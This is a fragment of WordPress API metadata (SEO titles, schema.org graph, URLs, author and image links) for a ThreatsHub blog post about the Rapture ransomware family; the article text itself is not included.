\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"Rapture, a Ransomware Family With Similarities to Paradise 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/","og_locale":"en_US","og_type":"article","og_title":"Rapture, a Ransomware Family With Similarities to Paradise 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2023-04-28T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/rapture-641.png","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. 
reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Rapture, a Ransomware Family With Similarities to Paradise","datePublished":"2023-04-28T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/"},"wordCount":1579,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/04\/rapture-a-ransomware-family-with-similarities-to-paradise.png","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Endpoints","Trend Micro Research : Ransomware","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/","url":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/","name":"Rapture, a Ransomware Family With Similarities to Paradise 2026 | ThreatsHub Cybersecurity 
News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/04\/rapture-a-ransomware-family-with-similarities-to-paradise.png","datePublished":"2023-04-28T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/04\/rapture-a-ransomware-family-with-similarities-to-paradise.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/04\/rapture-a-ransomware-family-with-similarities-to-paradise.png","width":974,"height":510},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Rapture, a Ransomware Family With Similarities to 
Paradise"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a86
71ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/51671","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=51671"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/51671\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/51672"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=51671"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=51671"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=51671"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}